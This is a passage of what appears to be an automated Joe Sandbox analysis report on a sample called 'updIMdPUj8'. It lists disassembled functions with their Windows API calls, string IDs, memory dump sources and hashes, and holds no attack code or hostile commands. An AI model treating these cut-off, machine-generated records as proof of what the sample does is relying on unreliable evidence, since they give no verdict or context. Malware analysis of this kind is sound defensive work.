                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B3C417
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00B3C41E
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C477
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B3C48A
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B3C4A7
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B3C4C7
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B3C4D7
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B3C4F1
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B3C509
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C535
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B3C548
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C59C
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B3C5AF
                                                                                                                                                                            • Part of subcall function 00B3AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B3AF35
                                                                                                                                                                            • Part of subcall function 00B3AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00B5E72C,?,?), ref: 00B3AF84
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                          • API String ID: 797121971-1840816070
                                                                                                                                                                          • Opcode ID: c46eb1032b1be87a7dff58be6b9ca4820d4dba9cfaa890039e55eb675a14ac75
                                                                                                                                                                          • Instruction ID: c68dd47ab6460f9039ea85787ddbb5f8edb58d60c392f90ddc42d1273595e47a
                                                                                                                                                                          • Opcode Fuzzy Hash: c46eb1032b1be87a7dff58be6b9ca4820d4dba9cfaa890039e55eb675a14ac75
                                                                                                                                                                          • Instruction Fuzzy Hash: E291A372148344BBD221EBE0DC49FFB7BECEB49F01F044859F649E6191DB75A6088762
                                                                                                                                                                          Function 00B26FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B26FAA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27013
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27084
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B27AAB
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetLastError.KERNEL32 ref: 00B27AF1
                                                                                                                                                                            • Part of subcall function 00B27A9C: CloseHandle.KERNEL32(?), ref: 00B27B00
                                                                                                                                                                            • Part of subcall function 00B2A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641,000000FF), ref: 00B2A1F1
                                                                                                                                                                            • Part of subcall function 00B2A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641), ref: 00B2A21F
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B27139
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B27155
                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B27298
                                                                                                                                                                            • Part of subcall function 00B29DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B273BC,?,?,?,00000000), ref: 00B29DBC
                                                                                                                                                                            • Part of subcall function 00B29DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B29E70
                                                                                                                                                                            • Part of subcall function 00B29620: CloseHandle.KERNELBASE(000000FF,?,?,00B295D6,?,?,?,?,?,00B52641,000000FF), ref: 00B2963B
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A501
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A532
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                          • API String ID: 3983180755-3508440684
                                                                                                                                                                          • Opcode ID: 06f8078bd221cf5f46867011098d20227382e5ef0e95921c50b2a25ca5575bdf
                                                                                                                                                                          • Instruction ID: 0953651049248287893d2d15e16ed86f6fd9fd780a058661dcb0657dbabdc2b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 06f8078bd221cf5f46867011098d20227382e5ef0e95921c50b2a25ca5575bdf
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EC1D871944624ABDB21DB74EC81FEEB3E8EF04700F0445D9F95EE3282DB34AA448B65
                                                                                                                                                                          Function 00B4D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                          • Opcode ID: 31c7c2df1016e1959e66024c8adb65023c9a92e11eea84537b245a885ad08368
                                                                                                                                                                          • Instruction ID: 57c1817e8edf342b7d23bc5c042618e8e380532ad1c3384026a586c4353eaf12
                                                                                                                                                                          • Opcode Fuzzy Hash: 31c7c2df1016e1959e66024c8adb65023c9a92e11eea84537b245a885ad08368
                                                                                                                                                                          • Instruction Fuzzy Hash: 61C21571E086288FDB25CE289D807AAB7F5FB48305F1541EAD85EE7241E774AF819F40
                                                                                                                                                                          Function 00B232F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog_swprintf
                                                                                                                                                                          • String ID: CMT$h%u$hc%u
                                                                                                                                                                          • API String ID: 146138363-3282847064
                                                                                                                                                                          • Opcode ID: 76e45636680df4786287c53981f7dd167f82c12c1f833892731c3e0df8dd8e68
                                                                                                                                                                          • Instruction ID: 9e624fd78ee81d9bea4490bbc29ef537c7812083a372652afad50e5a7935a994
                                                                                                                                                                          • Opcode Fuzzy Hash: 76e45636680df4786287c53981f7dd167f82c12c1f833892731c3e0df8dd8e68
                                                                                                                                                                          • Instruction Fuzzy Hash: 2732E571510294ABDF14DF74D895AEA3BE5EF15700F0804BDFD8E8B282DB789A49CB60
                                                                                                                                                                          Function 00B2286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B22874
                                                                                                                                                                          • _strlen.LIBCMT ref: 00B22E3F
                                                                                                                                                                            • Part of subcall function 00B302BA: __EH_prolog.LIBCMT ref: 00B302BF
                                                                                                                                                                            • Part of subcall function 00B31B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B2BAE9,00000000,?,?,?,0001046A), ref: 00B31BA0
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B22F91
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                                                                          • String ID: CMT
                                                                                                                                                                          • API String ID: 1206968400-2756464174
                                                                                                                                                                          • Opcode ID: 187e00df39417034561825f8e455ad680c69117313d7ab2b87bdba86923919f7
                                                                                                                                                                          • Instruction ID: 31daec0c6b9122fd1b63be4dfad906e07a1e4dec8e16656594d831039ea226d3
                                                                                                                                                                          • Opcode Fuzzy Hash: 187e00df39417034561825f8e455ad680c69117313d7ab2b87bdba86923919f7
                                                                                                                                                                          • Instruction Fuzzy Hash: 9962E3716002659FDB19DF38D8866EA3BE1EF54300F0845BEEC9ECB282DB759945CB60
                                                                                                                                                                          Function 00B3F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B3F844
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00B3F910
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3F930
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00B3F93A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                          • Opcode ID: ef060acd4688c7f8693e634bfb486a6d15693d5c3ae2d46ab7d4e4cdb16c7506
                                                                                                                                                                          • Instruction ID: 820b576ba8131e2291d25ea6e3b32fb8fb163fed4b20640de6d37160bffe8c2c
                                                                                                                                                                          • Opcode Fuzzy Hash: ef060acd4688c7f8693e634bfb486a6d15693d5c3ae2d46ab7d4e4cdb16c7506
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A310375D4531D9BDB21DFA4D989BCCBBF8AF08704F2041EAE40CAB250EB719A848F44
                                                                                                                                                                          Function 00B3E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualQuery.KERNEL32(80000000,00B3E5E8,0000001C,00B3E7DD,00000000,?,?,?,?,?,?,?,00B3E5E8,00000004,00B81CEC,00B3E86D), ref: 00B3E6B4
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B3E5E8,00000004,00B81CEC,00B3E86D), ref: 00B3E6CF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoQuerySystemVirtual
                                                                                                                                                                          • String ID: D
                                                                                                                                                                          • API String ID: 401686933-2746444292
                                                                                                                                                                          • Opcode ID: cb4c624e9d5b57c9442ab15faa8ad5d9defab532c02a13a75a32cb4e9c96a147
                                                                                                                                                                          • Instruction ID: 1d98c8ba1940f587e636874a4adc6fa2c3d643508bfa3344566689d997022d5f
                                                                                                                                                                          • Opcode Fuzzy Hash: cb4c624e9d5b57c9442ab15faa8ad5d9defab532c02a13a75a32cb4e9c96a147
                                                                                                                                                                          • Instruction Fuzzy Hash: 83012B32600209ABDF14DE29DC49BDD7BEAEFC4324F1CC161ED29D7290DA38ED058680
                                                                                                                                                                          Function 00B48EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B48FB5
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B48FBF
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B48FCC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: 0c091d5bfb894bd80b3db104e0b665647f376380614eabd861ffa507ee446f43
                                                                                                                                                                          • Instruction ID: 7a961065e1282d2df46a3ce8e24ab051cf47170f76ced2fb0c405a0112af35bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c091d5bfb894bd80b3db104e0b665647f376380614eabd861ffa507ee446f43
                                                                                                                                                                          • Instruction Fuzzy Hash: 8731A275941219ABCB21DF64D889B9DBBF8AF08310F6041EAE81CA7250EB709F858F44
                                                                                                                                                                          Function 00B4D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                          • Instruction ID: b6361c669ba32694cc8c55506c88949c2a4028ee6ae60cb1c326c39b2057cc9e
                                                                                                                                                                          • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C021C71E002199FDF14CFA9C9806ADB7F1EF98314F2582AAD919E7384D731AE41DB90
                                                                                                                                                                          Function 00B3AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B3AF35
                                                                                                                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00B5E72C,?,?), ref: 00B3AF84
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatInfoLocaleNumber
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2169056816-0
                                                                                                                                                                          • Opcode ID: cbf87bc8048f41259552c04be7df9431825a01ae921465c70a0e693b1107337f
                                                                                                                                                                          • Instruction ID: 8a90af6f892e7ed739c6318f60e2f4485191f49a398b5a2ba6622ceb54500aba
                                                                                                                                                                          • Opcode Fuzzy Hash: cbf87bc8048f41259552c04be7df9431825a01ae921465c70a0e693b1107337f
                                                                                                                                                                          • Instruction Fuzzy Hash: F601713A100309AAD7119F74DC45F9A77FCEF0C751F104062FA19E7250D7709A54CBA5
                                                                                                                                                                          Function 00B26C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00B26DDF,00000000,00000400), ref: 00B26C74
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B26C95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                          • Opcode ID: aa73affe4d522077357fb9115a8454b065f1d2ffcdbb10c041fe6452da999143
                                                                                                                                                                          • Instruction ID: 11b536adb00d17f8276fa343ff846302aa6b69135694942c3d9d06fc6e0f618c
                                                                                                                                                                          • Opcode Fuzzy Hash: aa73affe4d522077357fb9115a8454b065f1d2ffcdbb10c041fe6452da999143
                                                                                                                                                                          • Instruction Fuzzy Hash: A2D0A930344300BFFA021F219C46F6B3BD8FF40F82F28C084B788E90E0CA708820A628
                                                                                                                                                                          Function 00B519F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B519EF,?,?,00000008,?,?,00B5168F,00000000), ref: 00B51C21
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                          • Opcode ID: 94cb295f7cb3a36e619af9ffa93204fe5f4f7a26f30a8565660f5b3c396cc469
